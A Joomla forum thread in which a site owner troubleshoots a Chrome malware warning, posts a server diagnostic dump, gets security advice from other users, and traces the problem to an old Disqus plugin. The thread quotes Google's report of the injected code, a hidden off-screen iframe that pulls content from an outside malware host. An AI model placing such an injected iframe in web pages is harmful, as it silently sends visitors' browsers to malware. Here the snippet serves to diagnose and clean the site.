Google Chrome has blocked access...

[the-muse]

Hello Forum:

Using Joomla! 1.5. I've had the Disqus plugin installed on the site for over a year. Within the past couple of months, when attempting to visit the site, a Google Chrome warning appears instead:

"The Website Ahead Contains Malware!

Google Chrome has blocked access to http://www.taking on.net for now.
Even if you have visited this website safely in the past, visiting it now is very likely to infect your computer with malware. Malware is malicious software that causes things like identity theft, financial loss, and permanent file deletion. Learn more"

When I followed the "learn more" to investigate, the so-called "malware" was a Disqus javacript file. The site worked fine for a couple of years.

The site's splash page is located at: http://www.taking on.net

Anyone have any ideas what's happening here? I would prefer to continue to use Disqus, since it's become very popular web-wide. Many thanks in advance.

[Slackervaara]

Run the Forum Post Assistant and post the output here, so we can see if you have any security holes.
http://forum.joomla.org/viewtopic.php?f=432&t=586336
Google safe browsing says your site has malware:
http://safebrowsing.clients.google.com/ ... kingon.net

[the-muse]

Here is the FPA output. Thank you:

Google Chrome has blocked access

The Website Ahead Contains Malware!

Google safe browsing says your site has malware:
http://safebrowsing.clients.google.com/ ... kingon.net

Joomla! Instance :: Joomla! 1.5.20-Stable (senu takaa) 18-July-2010
Joomla! Configured :: Yes | Read-Only (644) | Owner: takingon (uid: 1/gid: 1) | Group: takingon (gid: 1) | Valid For: 1.5
Configuration Options :: Offline: 0 | SEF: 0 | SEF Suffix: 0 | SEF ReWrite: 0 | .htaccess/web.config: No | GZip: 0 | Cache: 0 | FTP Layer: 0 | SSL: 0 | Error Reporting: -1 | Site Debug: 0 | Language Debug: 0 | Database Credentials Present: Yes

Host Configuration :: OS: Linux | OS Version: 2.6.18-194.26.1.el5 | Technology: i686 | Web Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.13 | Encoding: gzip,deflate,sdch | Doc Root: /home/takingon/public_html | System TMP Writable: Yes

PHP Configuration :: Version: 5.2.13 | PHP API: apache2handler | Session Path Writable: Yes | Display Errors: 1 | Error Reporting: 6135 | Log Errors To: error_log | Last Known Error: | Register Globals: | Magic Quotes: 1 | Safe Mode: | Open Base: /home/takingon:/usr/lib/php:/usr/local/lib/php:/tmp | Uploads: 1 | Max. Upload Size: 20M | Max. POST Size: 8M | Max. Input Time: 60 | Max. Execution Time: 30 | Memory Limit: 32M

MySQL Configuration :: Version: 5.0.96-community (Client:5.0.96) | Host: --protected-- (--protected--) | Collation: latin1_swedish_ci (Character Set: latin1) | Database Size: 2.80 MiB | #of Tables:  41

PHP Extensions :: date (5.2.13) | libxml () | openssl () | pcre () | zlib (1.1) | bcmath () | calendar () | ctype () | curl () | dom (20031129) | hash (1.0) | filter (0.11.0) | ftp () | gd () | gettext () | session () | standard (5.2.13) | json (1.2.1) | mbstring () | mcrypt () | mhash () | mysql (1.0) | SimpleXML (0.1) | posix () | Reflection (0.1) | imap () | SPL (0.2) | mysqli (0.1) | sockets () | exif (1.4 $Id: exif.c 293036 2010-01-03 09:23:27Z sebastian $) | tokenizer (0.1) | xml () | xmlreader (0.1) | xmlwriter (0.1) | zip (1.8.11) | apache2handler () | timezonedb () | PDO (1.0.4dev) | pdo_sqlite (1.0.1) | SQLite (2.0-dev) | pdo_mysql (1.0.2) | ionCube Loader () | Zend Optimizer () | Zend Engine (2.2.0) |
Potential Missing Extensions :: iconv | suhosin |

Switch User Environment (Experimental) :: PHP CGI: No | Server SU: No | PHP SU: No | Custom SU (LiteSpeed/Cloud/Grid): Yes
Potential Ownership Issues: No

Apache Modules :: core | mod_access | mod_auth | mod_include | mod_deflate | mod_log_config | mod_logio | mod_env | mod_expires | mod_headers | mod_unique_id | mod_setenvif | mod_proxy | proxy_connect | proxy_ftp | proxy_http | mod_ssl | prefork | http_core | mod_mime | mod_status | mod_autoindex | mod_asis | mod_info | mod_suexec | mod_cgi | mod_negotiation | mod_dir | mod_imap | mod_actions | mod_userdir | mod_alias | mod_rewrite | mod_so | mod_auth_passthrough | mod_bwlimited | mod_fpcgid | mod_evasive20 | mod_php5 | mod_security2 | Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.13 |
Potential Missing Modules :: mod_security | mod_evasive | mod_dosevasive | mod_qos | mod_userdir |

Core Folders :: images/ (777) | components/ (777) | modules/ (777) | plugins/ (777) | language/ (777) | templates/ (777) | cache/ (777) | logs/ (777) | tmp/ (777) | administrator/components/ (777) | administrator/modules/ (777) | administrator/language/ (777) | administrator/templates/ (777) |

Elevated Permissions (First 10) :: tmp/ (777) | wiki/backups/ (777) | wiki/db/ (777) | wiki/dump/ (777) | wiki/img/wiki/ (777) | wiki/styles/ (777) | wiki/temp/ (777) | wiki/temp/cache/ (777) | wiki/templates/ (777) | wiki/whelp/ (777) |

Components :: SITE :: User (1.5.0) | Wrapper (1.5.0) | MailTo (1.5.0) |
Components :: ADMIN :: Content Page (1.5.0) | Newsfeeds (1.5.0) | Polls (1.5.0) | User Manager (1.5.0) | Messaging (1.5.0) | JaggyBlog (1.2.0) | Cache Manager (1.5.0) | Mass Mail (1.5.0) | Banners (1.5.0) | Language Manager (1.5.0) | Module Manager (1.5.0) | JCE (1.5.7.4) | Control Panel (1.5.0) | Trash (1.0.0) | Media Manager (1.5.0) | Contact Items (1.0.0) | Installation Manager (1.5.0) | Configuration Manager (1.5.0) | Template Manager (1.5.0) | Plugin Manager (1.5.0) | Menus Manager (1.5.0) | Frontpage (1.5.0) | Weblinks (1.5.0) | AlphaRegistration (2.0.12) | Search (1.5.0) |

Modules :: SITE :: Blog Categories (1.0.0) | Login (1.5.0) | Latest News (1.5.0) | Most Read Content (1.5.0) | Custom HTML (1.5.0) | Banner (1.5.0) | Statistics (1.5.0) | Newsflash (1.5.0) | Random Image (1.5.0) | Wrapper (1.0.0) | Feed Display (1.5.0) | Syndicate (1.5.0) | Who\'s Online (1.0.0) | Breadcrumbs (1.5.0) | Latest Comments (1.0.0) | Latest Blog Posts (1.0.0) | Related Items (1.0.0) | Poll (1.5.0) | Footer (1.5.0) | Archived Content (1.5.0) | Menu (1.5.0) | Search (1.0.0) | Sections (1.5.0) |
Modules :: ADMIN :: Login Form (1.0.0) | User Status (1.5.0) | Latest News (1.0.0) | Custom HTML (1.5.0) | Title (1.0.0) | Popular Items (1.0.0) | Items Stats (1.0.0) | Admin Menu (1.0.0) | Admin Submenu (1.0.0) | Toolbar (1.0.0) | Feed Display (1.5.0) | Logged in Users (1.0.0) | Quick Icons (1.0.0) | Online Users (1.0.0) | Footer (1.0.0) | Unread Items (1.0.0) |

Plugins :: SITE :: Button - Pagebreak (1.5) | Button - Image (1.0.0) | Button - Readmore (1.5) | Content - Example (1.0) | Content - Page Navigation (1.5) | Content - Pagebreak (1.5) | Content - Email Cloaking (1.5) | AllVideos (by JoomlaWorks) (3.3) | Content - Vote (1.5) | Disqus Comment System for Joom (2.2) | Content - ChronoComments (1.2) | Content - Load Modules (1.5) | Content - Code Highlighter (Ge (1.5) | Paste (1.5.7.4) | Advanced Link (1.5.7.4) | Joomla! Links for Advanced Lin (1.2.1) | Zoo2 Links for Advanced Link (1.0.0) | Media Object support (1.5.7.4) | File Browser (1.5.7.4) | JCE SPELLCHECKER TITLE (1.5.7.4) | Paste (1.5.7.4) | Image Manager (1.5.7.4) | Advanced Code Editor (1.5.7.4) | Editor - JCE 1.5.7.4 (1.5.7.4) | Editor - XStandard Lite for Jo (1.0) | Editor - TinyMCE 3 (3.2.6) | User - Example (1.0) | User - Joomla! (1.5) | System - Remember Me (1.5) | System - Legacy (1.5) | System - Cache (1.5) | System - JCE MediaBox (1.0.10) | System - Log (1.5) | System - Backlinks (1.5) | System - Mootools Upgrade (1.5) | System - SEF (1.5) | System - Debug (1.5) | System - AlphaRegistration (2.0.10) | XML-RPC - Joomla API (1.0) | XML-RPC - Blogger API (1.0) | Authentication - Example (1.5) | Authentication - LDAP (1.5) | Authentication - OpenID (1.5) | Authentication - Joomla (1.5) | Authentication - GMail (1.5) | Search - Newsfeeds (1.5) | Search - Weblinks (1.5) | Search - Sections (1.5) | Search - Categories (1.5) | Search - Contacts (1.5) | Search - Content (1.5) |

Templates :: SITE :: beez (1.0.0) | rhuk_milkyway (1.0.2) | JA_Purity (1.2.0) |
Templates :: ADMIN :: Khepri (1.0) |

[mandville]

initial view.
out of date joomla
out of dte extensions
open folder permissions
no htaccess file
review and action http://docs.joomla.org/Security_Checklist_7

[the-muse]

Thank you.

[the-muse]

P.S. - As a follow up to this issue for anyone else who may have this problem, I removed the Disqus plugin from the Joomla site in question, sent Google a request to review the site, and the problem was resolved. It was a Joomla plugin which was responsible. Although running the Forum Post Assistant and posting the output here to see if there were any security holes may be a routine action for solving problems here, the output and resulting response did not solve the problem, and really had nothing to do with the problem. The problem was in the Joomla Disqus plugin. Once that was removed, the problem disappeared .

I appreciate your taking the time to look at the output of the FPA. However, I hope you realize that it wasn't really necessary to get the solution to this problem. :

Sent to Google 1-21-13

The following two files were part of a Joomla 1.5 Disqus commenting plugin. I have removed the plugin, and the files no longer exist at this site.

Thank you for bringing this to my attention. Please review, and if found clean, remove the warning.

Here is the code found within the Disqus plugin JavaScript:

Last checked: December 10, 2012
When Google last tested this page, your server returned content that directed the browser to a site that serves malware. Below is an example of suspected injected code. We recommend you check your source code for this and any other unauthorized changes, and reference our guidelines for cleaning your site and requesting a review.
Show 25 rows 1-1 of 1

Suspected injected code
document.write('<iframe width="50" height="50" style="width:
100px;height:100px;position:absolute;left:-100px;top:0;" src
="http://vadoonief.qhigh .com/nighttrend.cgi?8"></iframe>');

Type Code Injection
Instances 1 or more

Google reviewed the site after removal of the Disqus plugin, and within a few hours, the warning was removed. I hope this helps anyone else who may have this problem.

The site was built with Joomla 1.5, installed automatically through "Fantastico" on a cPanel server. Upgrading 1.5 to the latest version is a nightmare, so I may just copy all the articles and install a fresh New Joomla.

Best wishes to all. Joomla is OUTSTANDING!

[mandville]

the fpa has highlighted that you are not running suphp which can cause major issues and be a security risk. that is also why you have 777 folder permissions, you are also not using a hta file

regarding the discus plugin, if you have a copy then send it to the vel team if its a current item and they will deal with it as needed.

[the-muse]

Yes. I have changed folder permissions manually. I do have an .htaccess file. The bottom of the file shows this:

########## Begin - Joomla! core SEF Section
#
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_URI} !^/index.php
RewriteCond %{REQUEST_URI} (/|\.php|\.html|\.htm|\.feed|\.pdf|\.raw|/[^.]*)$ [NC]
RewriteRule (.*) index.php
RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization},L]
#
########## End - Joomla! core SEF Section

The Disqus plugin came from a Joomla plugin site. I removed it from my site. I later found that Disqus offers instructions for its use with Joomla at: http://disqus.com/admin/joomla/ . From that page, the link to the download is: http://extensions.joomla.org/extensions/5259/details

I have decided not to use Disqus with this Joomla site. As I stated before, I plan on copying the articles at my site, upgrading to 2.5, then staying with the JaggyBlog extension for comments.

Thanks again.

[mandville]

Make sure you rename htaccess.txt to .htaccess

[the-muse]

I've already done that. I had .htaccess before I ran the FPA, but I changed the name because I thought it might have been Google's problem.

I hope we learned something here.

Thanks again.

[mandville]

the plugin shown in your fpa is 2.2 - the plugin listed in the jed is 3.2 (last update on Nov 6, 2012)

[the-muse]

And? I already know the plugin shown in the fpa is from an earlier date that the one now listed at the jed. I installed the older plugin long before the 3.2 was available. Apparently the older plugin had a security issue.

There's really no need to continue this discussion. From my perspective, you really didn't do anything to solve my problem. You never once even addressed the subject of my initial post here. You still haven't.

But thank you for responding at all. That's more than I've seen at some forums.

Best wishes.